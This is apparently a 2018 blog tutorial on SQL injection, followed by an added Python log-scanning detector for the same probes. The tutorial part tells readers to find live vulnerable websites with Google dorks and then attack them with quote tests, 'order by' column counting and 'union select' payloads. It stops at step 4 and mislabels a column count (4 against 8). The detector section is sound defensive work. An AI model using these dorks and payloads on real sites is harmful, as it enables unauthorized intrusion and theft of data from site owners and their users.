
Thursday 1 March 2018


Before we look at what SQL injection is, we should know what SQL and a database are. You can find this in my previous post here: link.

Now, here's the step-by-step guide to "SQL Injection".
Step 1: Finding Vulnerable Website:
Remember, Uncle Google is always a hacker's friend. We can find vulnerable websites using a dork list. Google dorking means searching for vulnerable websites using Google search tricks. There are a lot of tricks for searching in Google, but we are going to use the "inurl:" command to find vulnerable websites.

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id

How to use a Google dork?
Type one of the above commands into the Google search box and hit Enter.
You will get a list of websites.
You need to check each one for the vulnerability, so start from the first website.

Step 2: Checking the Vulnerability:
Now we should check the vulnerability of the website. To check it, add a single quote ( ' ) at the end of the URL and hit Enter. (No space between the number and the single quote.)

eg:- http://www.abc.com/index.php?id=2'

If the page stays the same, shows "page not found", or shows some other webpage, then it is not vulnerable.

If it shows any error related to the SQL query, then it is vulnerable.
eg:- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:
Now we have found that the website is vulnerable. The next step is to find the number of columns in the table.
For that, replace the single quote (') with an "order by n" statement.
P.S.: n is the numbers 1,2,3,4,5,6,...n, until you get an error like "unknown column".

eg:- http://www.victimsite.com/index.php?id=705 order by 1,2,3,4,5,6,7,8,9

You get an error like "Unknown Column no.(1,2,3..) in order clause".
eg :-
Unknown Column 9 in order clause

If you get the error while trying the number x, then the number of columns is "x-1",
i.e. if you get an error at 9, then the number is 9-1 = "8".
Sometimes the above may not work. In that case, add "--" at the end of the statement.
For eg: http://www.victimsite.com/index.php?id=705 order by 1,2,3,4,5,6,7,8,9--

Step 4: Displaying the Vulnerable columns:
Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by" with this statement, and change the id value to negative (I mean id=-2; it must be changed, but some websites may work without changing it).

Replace columns_sequence with the numbers from 1 to x-1 (the number of columns), separated with commas (,).
If the number of columns is 4, then the query is as follows: http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7,8--
It will show some numbers on the page which are less than the x no., i.e. here 8.
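
Seen from the server side, the requests in Steps 2 to 4 leave a recognizable trail in the web access log. The following is an added example, not code from the original post: it URL-decodes each query parameter and records, per client IP, the quote test, the "order by" column count and the "union select" stage. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines; IPs are from documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Mar/2018:10:00:01 +0000] "GET /index.php?id=2 HTTP/1.1" 200 5120
203.0.113.7 - - [01/Mar/2018:10:00:09 +0000] "GET /index.php?id=2%27 HTTP/1.1" 500 312
203.0.113.7 - - [01/Mar/2018:10:00:30 +0000] "GET /index.php?id=705+order+by+9-- HTTP/1.1" 500 298
203.0.113.7 - - [01/Mar/2018:10:01:02 +0000] "GET /index.php?id=-2%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8-- HTTP/1.1" 200 5200
198.51.100.4 - - [01/Mar/2018:10:02:00 +0000] "GET /article.php?id=17&title=o%27reilly-book HTTP/1.1" 200 4100
"""

# One pattern per step of the procedure, applied to the decoded parameter value.
STAGES = [
    ("quote_probe", re.compile(r"^-?\d+\s*['\"]$")),      # number followed by a lone quote
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
]
STAGE_ORDER = [name for name, _ in STAGES]
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(url):
    """Return the set of probe stages seen in any query parameter of url."""
    found = set()
    for _name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for stage, pattern in STAGES:
            if pattern.search(value):
                found.add(stage)
    return found

def scan(log_text):
    """Map client IP -> distinct stages observed, in the order first seen."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line this parser understands
        ip, url = m.groups()
        for stage in sorted(classify(url), key=STAGE_ORDER.index):
            if stage not in seen[ip]:
                seen[ip].append(stage)
    return dict(seen)

def escalated(report, threshold=2):
    """IPs showing at least `threshold` stages: a probing sequence, not a stray typo."""
    return sorted(ip for ip, stages in report.items() if len(stages) >= threshold)
```

Matching like this only detects the probing; the fix is to pass the id value to the database through a parameterized query so it is never parsed as SQL.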


